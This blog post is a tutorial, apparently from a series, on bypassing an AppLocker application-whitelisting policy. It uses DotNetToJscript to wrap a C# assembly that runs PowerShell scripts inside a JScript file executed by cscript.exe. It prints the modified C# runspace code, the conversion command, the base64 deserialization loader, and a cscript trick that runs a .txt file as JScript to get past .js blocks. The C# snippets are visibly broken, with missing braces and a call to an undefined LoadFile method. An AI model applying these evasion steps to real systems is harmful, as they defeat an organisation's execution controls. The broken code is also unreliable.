In my previous post I showed you how to bypass policy restrictions which won’t let you execute powershell.exe.

Now let’s move on to a more complicated (but realistic) scenario:

  • you can’t run exe files located outside the “classic” Windows directories because there is an App Locker policy which won’t permit it

Say bye-bye to powershell? Not at all, we have other possibilities!

Introducing DotNetToJscript , a wonderful tool to generate Jscript (.js) files which bootstraps an arbitrary .NET Assembly and class.

JScript  and VBscript files are  interpreted by native “cscript.exe”  a legitimate executable located in System32 , so there should be no problem, right?

Let’s start!

First of all, download the entire project, fireup Visual Studio 2015, open the project “DotNetToJScript.sln” and switch to TestClass.cs:



Comment out the MessageBox(..) in in the TestClass() constructor method otherwise you will get a Message Box every time.

Now insert the  references to “System.Management.Automation.Runspaces”, “System.Management.Automation” and  add the following methods in TestClass:

private string LoadScript(string filename)
    string buffer ="";
    try {
        buffer = File.ReadAllText(filename);
    catch (Exception e)
       return "";
    return buffer;
 public void RunScript(string filename)
    Runspace MyRunspace = RunspaceFactory.CreateRunspace();
    Pipeline MyPipeline = MyRunspace.CreatePipeline();
    string script=LoadFile(filename);
    Collection<PSObject> outputs = MyPipeline.Invoke();
    StringBuilder sb = new StringBuilder();
    foreach (PSObject pobject in outputs)


As you can see I only made some small changes, output will be printed directly in RunScript() which is now a public void method.

Time to compile the entire solution and if everything works fine you will have the following files:

  • Dotnettojscript.exe – The “converter”
  • ExampleAssembly.dll  – The  assembly of our  TestClass

Dotnettojscript.exe will generate a .js script from our assembly:

Dotnettojscript.exe <path_of_assembly> > testps.js


Our  “testps.js” file is ready, let’s take a look at it.

Basically, our assembly has been converted into a base64 serialized object.

When we invoke the script,  these action will take place:

var entry_class = 'TestClass';
try {
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm); al.Add(undefined);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
} catch (e) {

The stored object is converted to a stream, deserialized and finally instantiated .

We just added the RunScript() call invoking our powershell test script.

And now comes the moment of truth, we are ready to  execute it:



Bingo again! It works, we called our powershell script from a .js file!  Cool, do you agree?

Some policy blocking .js files? No problem:

c:\scripts>cscript //e:jscript testps.txt


That’s all for now 😉


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s